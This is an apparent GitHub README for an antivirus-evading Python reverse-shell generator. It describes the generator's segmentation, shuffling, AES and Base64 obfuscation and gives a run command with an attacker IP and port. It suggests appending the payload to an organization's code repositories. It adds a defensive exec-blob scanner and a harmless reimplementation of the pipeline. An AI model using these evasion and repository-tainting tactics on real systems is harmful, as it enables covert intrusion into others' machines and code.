AV-evading Pythonic Reverse Shell with Dynamic Adaption Capabilities

tanc7/dark-lord-obama

Latest commit

0a79b05 · Sep 9, 2021

Dark Lord Obama will now be transitioned into Google Golang

The Python 2 to 3 transition was a clusterfuck, an atomic blast of breakage. https://lwn.net/Articles/843660/

It pisses me off, because my code worked PERFECTLY. But now PyPI won't properly install the dependencies required for this to work. Even manually installing PyCrypto will throw errors: https://pypi.org/project/pycrypto/#files.

And I am not a big fan of half-assed hacks to fix things that should have been supported via some sort of compatibility.

Everyone, please move along to the successor of DarkLordObama, EXOCET-Antivirus-Evasion. https://github.com/tanc7/EXOCET-AV-Evasion

Python is not, IMO, a programming language. It's a scripting language because it runs through an interpreter built primarily on C and various other languages.

Golang, on the other hand, can be cross-compiled across multiple platforms from a single codebase with minimal modifications, usually only for compatibility issues with the target operating system. But the point is, Golang WORKS.

I am planning to add inline assembly execution via Golang, which is considered impossible, but watch me do it. I will do it!

Dark Lord Obama - Undetectable Pythonic Payload Generator

Chang Tan Lister Lister Unlimited Cybersecurity Solutions, LLC. changtan@listerunlimited.com

DLO generates a Pythonic reverse shell that, as of July 29th, 2019, was not flagged by any VirusTotal engine (a static multi-engine scan on one date; it says nothing about behavioural detection or signatures added later). It combines several techniques that will not be disclosed in detail, including but not limited to:

  1. "Command Segmentation"
  2. "AES Encryption" with a 32-byte key and a 16-byte initialization vector (AES keys are 16, 24 or 32 bytes, so a 32-byte key is AES-256; the IV is always one 16-byte block)
  3. Base64 Encoding - It was a necessity
  4. Inline Python exec() calls, C asm() functions (to be added), Java/Jython, Cython, ctypes

Dark Lord Obama Official Release Demo

Please click this link for a demonstration video of how to use it:

Demo Video

Suggested Uses

Currently, after you gain a foothold in an organization, you can:

  1. Run the payload standalone.
  2. Replace the proof-of-concept code with a Metasploit Python payload.
  3. Taint/corrupt Python repositories: locate an organization's Python code repositories during a pentest, then copy the entire generated code and append it to the bottom of a Python module. Module-level code runs whenever the module is imported or executed, which guarantees the reverse shell fires when the code runs.
  4. Use the payload as a stager to download additional payloads.
  5. Use the payload against macOS hosts (MacBooks, iMacs, etc.), which shipped a system Python 2.7 interpreter at the time (Apple removed it in macOS 12.3, so this no longer holds on current systems).

Run it as python darklordobama.py <attacker IP> <attacker listening port>
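The repository-tainting use above is also the easiest place to catch this technique: an appended payload has to end in a module-level exec() or eval() of a decoded blob. The scanner below is an added example written for the defender's side (it is not dark-lord-obama's code), walks a module's AST with the standard library only, and flags exec()/eval() calls whose argument goes through a Base64-style decoder or carries a long string literal. The module names, the decoder list, the 200-character threshold and the sample modules are this example's own choices, and it assumes Python 3 syntax: Python 2's `exec "..."` statement does not parse here, so Python 2 code must be scanned with a Python 2 parser (or a SyntaxError treated as a finding).

```python
"""Scan a Python module for exec()/eval() of decoded or embedded blobs.

Added example, not the project's code. Stdlib only (ast). Assumes Python 3
syntax; see the lead-in for Python 2 code.
"""
import ast

EXEC_LIKE = {"exec", "eval"}
DECODERS = {"b64decode", "decodebytes", "decodestring", "a85decode", "b32decode"}
LONG_LITERAL = 200  # characters; threshold is this example's choice


def _callee(call: ast.Call):
    """Simple name of a call target: exec(...) -> 'exec', base64.b64decode(...) -> 'b64decode'."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def find_exec_of_blobs(source: str):
    """Return [(lineno, runs_on_import, reason)] for suspicious exec/eval calls.

    runs_on_import is True when the call sits outside any def/class, i.e. it
    executes as soon as the module is imported, which is what an appended
    payload relies on.
    """
    findings = []
    for stmt in ast.parse(source).body:
        runs_on_import = not isinstance(
            stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef))
        for node in ast.walk(stmt):
            if not (isinstance(node, ast.Call) and _callee(node) in EXEC_LIKE):
                continue
            inner = {_callee(c) for c in ast.walk(node)
                     if isinstance(c, ast.Call) and c is not node}
            long_literal = any(
                isinstance(c, ast.Constant)
                and isinstance(c.value, (str, bytes))
                and len(c.value) >= LONG_LITERAL
                for c in ast.walk(node))
            if inner & DECODERS:
                findings.append((node.lineno, runs_on_import, "decoder in argument"))
            elif long_literal:
                findings.append((node.lineno, runs_on_import, "long literal argument"))
    return findings


# Constructed sample modules; the Base64 string is a placeholder and is never executed.
CLEAN_MODULE = '''\
import os

def helper(path):
    return os.path.basename(path)
'''

TAINTED_MODULE = CLEAN_MODULE + '''\
import base64
# --- appended after the legitimate code (constructed sample) ---
_blob = "cHJpbnQoJ3NhbXBsZScp"
exec(base64.b64decode(_blob).decode())
'''


if __name__ == "__main__":
    print("clean:  ", find_exec_of_blobs(CLEAN_MODULE))
    print("tainted:", find_exec_of_blobs(TAINTED_MODULE))
```

The scanner only sees a decoder that appears inside the exec()/eval() call itself; a payload that decodes into a variable several lines earlier and then calls exec(var) needs simple data-flow tracking on top of this, and any finding with runs_on_import set deserves a look at the module's git history to see when those lines arrived.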

How does it work?

First it chops up your payload into two-character segments ("Command Segmentation").

An array map recording each segment's original position is produced so that the payload can reconstitute itself at run time.

The segments are shuffled into a list and then encrypted with AES. (The page calls this AES-128 but gives a 32-byte key, which would be AES-256. Either way, the key, IV and map have to travel inside the payload for it to reconstitute itself, so this step defeats static signatures on the plaintext but is obfuscation, not confidentiality: anyone holding the file can unwrap it.)

The encrypted payload is encoded in Base64.
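The pipeline above, written out end to end as an added example (this is not dark-lord-obama's code). Python's standard library has no AES, so the cipher step here is a SHA-256 counter-mode keystream XOR standing in for AES; the structure around it is the point. The function names, the blob layout, the seeded shuffle and the harmless sample payload are this example's own choices. decode_blob() deliberately takes nothing but the blob, to show that every secret the unwrapping needs is carried in the blob itself.

```python
"""Segment / map / shuffle / encrypt / Base64 pipeline, as described above.

Added example, not the project's code. Stdlib only: the keystream_xor step is
a stand-in for AES, which the standard library does not provide.
"""
import base64
import hashlib
import json
import os
import random

SEGMENT_SIZE = 2  # two-character "command segments"


def segment(payload: str, size: int = SEGMENT_SIZE) -> list:
    """Chop the payload into fixed-size character segments."""
    return [payload[i:i + size] for i in range(0, len(payload), size)]


def shuffle_with_map(segments: list, seed=None):
    """Shuffle the segments and return (shuffled, order).

    order[j] is the original index of shuffled[j]; it is the array map the
    payload needs to put itself back together.
    """
    order = list(range(len(segments)))
    random.Random(seed).shuffle(order)
    return [segments[i] for i in order], order


def reconstitute(shuffled: list, order: list) -> str:
    """Invert shuffle_with_map using the order map."""
    out = [None] * len(shuffled)
    for j, original_index in enumerate(order):
        out[original_index] = shuffled[j]
    return "".join(out)


def keystream_xor(data: bytes, key: bytes, iv: bytes) -> bytes:
    """Stand-in for AES: XOR with SHA-256(key || iv || counter) blocks.

    Symmetric, so the same call encrypts and decrypts. Not AES; used only
    because the standard library has no AES implementation.
    """
    out = bytearray()
    for offset in range(0, len(data), 32):
        block = hashlib.sha256(key + iv + offset.to_bytes(8, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[offset:offset + 32], block))
    return bytes(out)


def generate(payload: str, seed=None) -> str:
    """Produce the Base64 blob a dropper would carry."""
    shuffled, order = shuffle_with_map(segment(payload), seed)
    key = os.urandom(32)  # 32-byte key, matching the key size stated above
    iv = os.urandom(16)   # one 16-byte AES block
    ciphertext = keystream_xor(json.dumps(shuffled).encode(), key, iv)
    blob = {
        "key": base64.b64encode(key).decode(),
        "iv": base64.b64encode(iv).decode(),
        "map": order,
        "ct": base64.b64encode(ciphertext).decode(),
    }
    return base64.b64encode(json.dumps(blob).encode()).decode()


def decode_blob(blob_b64: str) -> str:
    """Unwrap a blob. Needs nothing that is not inside the blob itself."""
    blob = json.loads(base64.b64decode(blob_b64))
    key = base64.b64decode(blob["key"])
    iv = base64.b64decode(blob["iv"])
    shuffled = json.loads(keystream_xor(base64.b64decode(blob["ct"]), key, iv))
    return reconstitute(shuffled, blob["map"])


def plaintext_visible(blob_b64: str, needle: str) -> bool:
    """True if the needle appears verbatim once the outer Base64 layer is removed."""
    return needle in base64.b64decode(blob_b64).decode()


if __name__ == "__main__":
    # Constructed, harmless sample in place of a reverse shell.
    sample = "import platform\nprint(platform.system())\n"
    blob = generate(sample, seed=1)
    print(blob[:60], "...")
    print("plaintext visible:", plaintext_visible(blob, "platform"))
    print("round trip ok:", decode_blob(blob) == sample)
    # A dropper's last line would be: exec(decode_blob(BLOB))
```

The generate() side is what a string-signature scan sees: no plaintext survives even one layer down. The decode_blob() side is what an analyst runs on a captured dropper, and it is identical to what the dropper itself runs before its final exec(), which is why the exec() of a decoded blob, not the encrypted content, is the durable thing to detect.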